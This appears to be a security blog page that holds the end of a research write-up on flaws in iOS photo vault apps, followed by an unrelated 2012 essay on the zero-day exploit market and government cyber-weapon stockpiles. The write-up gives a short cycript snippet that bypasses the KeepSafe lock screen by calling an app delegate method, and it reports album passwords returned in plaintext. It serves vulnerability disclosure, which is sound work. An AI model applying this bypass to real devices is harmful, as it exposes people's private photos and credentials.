The lock screen could be bypassed by calling the showMainStoryboard method from the KeepSafe.AppDelegate class. Again we attach to the process with cycript, and this time we enumerate the instance methods of the class.
Examining the instance methods reveals showAccountStoryboard and showMainStoryboard, and calling either of these methods as shown bypasses the lock screen:
Figure 39: Bypassing the lock screen
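
For readers without the screenshots, the calls look roughly like the following in cycript (the process name is an assumption, and the app delegate is assumed to respond to the methods listed above):

cycript -p KeepSafe
[UIApp.delegate showMainStoryboard]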
 
The application also allows the user to password protect each album. Each album is synced to the cloud.
Figure 40: KeepSafe cloud storage
I discovered that the password for the albums was returned in plaintext from the server as shown:
Figure 41: Album password returned in plaintext from the server
 
An attacker could therefore not only bypass the lock screen but also obtain the passcode for password-protected albums.
Conclusion
Ok so let’s do a quick recap on what we were able to accomplish. We used:
  • cycript to bypass the lock screens
  • sqlite to extract sensitive information from the application databases
  • plutil to read plist files and access sensitive information
  • BurpSuite Pro to intercept traffic from the application
  • IDA Pro to reverse the binary and achieve results similar to cycript

The scary part of this is that, on average, it took less than 30 minutes to gain access to the photos and user credentials for each application. The only exception was the use of IDA, and as we highlighted, we only did that to introduce you to ARM assembly and get you comfortable reading it. In other words, it’s possible for an attacker to access your private photos in minutes.
In all cases it was trivial to bypass the lock screen protection. In short I found:
  • No jailbreak detection routines
  • Insecure storage of credentials
  • Photos stored unencrypted
  • Lock screens are easy to bypass
  • Common web application vulnerabilities

Let me hasten to say that this research does not speak to ALL photo vault applications. I just grabbed what seemed to be the most popular and had a quick look. That said, I wouldn’t be surprised if others had similar issues, as developers often make incorrect assumptions (believing users will never have access to the file system).
What are some of the risks? First and foremost, if you are running these apps on a jailbroken device, it is trivial to gain access to them. And in the case of My Media, even if you are not on a jailbroken device, anyone could connect to the media server it starts up and access your data.
More importantly though is the fact that your data is not encrypted. A malicious app (some of which have popped up recently) could gain access to your data.
The next time you download one of these apps, keep in mind it may not be doing what you think it is doing. Better yet, don’t store “private” photos on your device in the first place.
References:
  1. http://www.zdziarski.com/blog/?p=3951
  2. Hacking and Securing iOS Applications: Stealing Data, Hijacking Software, and How to Prevent It
  3. http://www.cycript.org/
  4. http://cgit.sukimashita.com/usbmuxd.git/snapshot/usbmuxd-1.0.8.tar.gz
  5. http://resources.infosecinstitute.com/ios-application-security-part-42-lldb-usage-continued/
  6. https://github.com/stefanesser/dumpdecrypted
  7. https://developer.apple.com/library/ios/technotes/tn2239/_index.html#//apple_ref/doc/uid/DTS40010638-CH1-SUBSECTION34
  8. https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIResponder_Class/#//apple_ref/occ/instm/UIResponder/nextResponder

INSIGHTS | December 20, 2012

Exploits, Curdled Milk and Nukes (Oh my!)

Throughout the second half of 2012 many security folks have been asking “how much is a zero-day vulnerability worth?” and it’s often been hard to believe the numbers that have been (and continue to be) thrown around. For the sake of clarity though, I do believe that it’s the wrong question… the correct question should be “how much do people pay for working exploits against zero-day vulnerabilities?”

The answer in the majority of cases tends to be “it depends on who’s buying and what the vulnerability is,” regardless of the question’s particular phrasing.

On the topic of exploit development, last month I wrote an article for DarkReading covering the business of commercial exploit development, and in that article you’ll probably note that I didn’t discuss the prices these exploits retail for. That’s because of my elusive answer above… I know of some researchers with their own private repositories of zero-day remote exploits for popular operating systems seeking $250,000 per exploit, and I’ve overheard hushed bar conversations that certain US government agencies will beat any foreign bid by four times the value.

But that’s only the thin-edge of the wedge. The bulk of zero-day (or nearly zero-day) exploit purchases are for popular consumer-level applications – many of which are region-specific. For example, a reliable exploit against Tencent QQ (the most popular instant messenger program in China) may be more valuable than an exploit in Windows 8 to certain US, Taiwanese, Japanese, etc. clandestine government agencies.

More recently some of the conversations about exploit sales and purchases by government agencies have focused in upon the cyberwar angle – in particular, that some governments are trying to build a “cyber weapon” cache and that unlike kinetic weapons these could expire at any time, and that it’s all a waste of effort and resources.

I must admit, up until a month ago I was leaning a little towards that same opinion. My perspective was that it’s a lot of money to be spending on something that’ll most likely sit on the shelf and expire into uselessness before it could ever be used. And then I happened to visit the National Museum of Nuclear Science & History on a business trip to Albuquerque.

Museum: Polaris Missile

 

Museum: Minuteman missile part?

For those of you that have never heard of the place, it’s a museum that plots out the history of the nuclear age and the evolution of nuclear weapon technology (and I encourage you to visit!).

Anyhow, as I literally strolled from one (decommissioned) nuclear missile to another – each lying on its side, rusting and corroding away, having never been used – it finally hit me: governments have been doing the same thing for the longest time, and cyber weapons really are no different!

Perhaps it’s the physical realization of “it’s better to have it and not need it, than to need it and not have it”, but as you trace the billions (if not trillions) of dollars that have been spent by the US government over the years developing each new nuclear weapon delivery platform, deploying it, manning it, eventually decommissioning it, and replacing it with a new and more efficient system… well, it makes sense and (frankly) it’s laughable how little money is actually being spent in the cyber-attack realm.

So what if those zero-day exploits purchased for measly 6-figure wads of cash curdle like last month’s milk? That price wouldn’t even cover the cost of painting the inside of a decommissioned missile silo.

No, the reality of the situation is that governments are getting a bargain when it comes to constructing and filling their cyber weapon caches. And, more to the point, the expiry of those zero-day exploits is a well understood aspect of managing an arsenal – conventional or otherwise.

— Gunter Ollmann, CTO – IOActive, Inc.